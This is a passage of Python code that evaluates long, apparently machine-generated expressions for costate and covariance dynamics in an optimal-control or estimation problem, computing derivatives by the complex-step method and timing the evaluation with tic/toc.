lamP12_N*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p12_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(-lamP22_N*p23_s*v*cos(theta_n*theta_s)/p22_s + lamP13_N*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p13_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP23_N*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP33_N*p23_s*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p33_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(lamP13_N*p33_s*v*sin(theta_n*theta_s)/p13_s - lamP23_N*p33_s*v*cos(theta_n*theta_s)/p23_s),
tf*0,
])
print(fx)
tock = toc()
print('A:' + str(tock))
tic()
for i in range(1000):
gx = np.array([
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - 
xb)*(p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p23_n*p23_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p23_n*p23_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_n*p13_s*(x_n*x_s - 
xb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p13_n*p13_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p23_n*p23_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p13_n*p13_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_s*(1.0e-50*1j + theta_n))**2 - 2*p13_n*p13_s*v*sin(theta_s*(1.0e-50*1j + theta_n)) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_s*(1.0e-50*1j + theta_n))*cos(theta_s*(1.0e-50*1j + theta_n)) - p13_n*p13_s*v*sin(theta_s*(1.0e-50*1j + theta_n)) + p13_n*p13_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_s*(1.0e-50*1j + theta_n)) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_s*(1.0e-50*1j + theta_n))**2 + p13_n*p13_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) + p23_n*p23_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamX_N*(ep*u_max*cos(w) + v*cos(theta_s*(1.0e-50*1j + theta_n))/x_s) + lamY_N*v*sin(theta_s*(1.0e-50*1j + theta_n))/y_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_s*v*(1.0e-50*1j + p13_n)*sin(theta_n*theta_s) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_s*v*(1.0e-50*1j + p13_n)*sin(theta_n*theta_s) + p13_s*v*(1.0e-50*1j + p13_n)*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s 